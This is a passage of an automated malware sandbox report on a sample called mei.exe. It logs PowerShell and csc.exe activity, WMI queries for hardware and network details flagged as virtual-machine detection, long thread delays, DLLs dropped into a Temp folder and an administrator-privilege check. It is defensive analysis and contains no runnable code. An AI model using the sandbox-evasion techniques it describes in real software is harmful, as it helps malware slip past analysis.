              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7491Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 625Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6963Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 757Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1827
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 494
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2581
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2996
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3869
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2600
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1196
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2458
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16550
              Source: C:\Users\user\Desktop\mei.exeAPI coverage: 7.4 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 7491 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 625 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 6963 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 757 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 1827 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 185 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200Thread sleep count: 494 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8324Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8244Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8212Thread sleep count: 2996 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8212Thread sleep count: 58 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep count: 3869 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep count: 131 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2664Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 2600 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 1196 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8520Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8452Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540Thread sleep count: 2458 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8584Thread sleep count: 259 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E7CFC _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6313E7CFC
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313E7CFC _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6313E7CFC
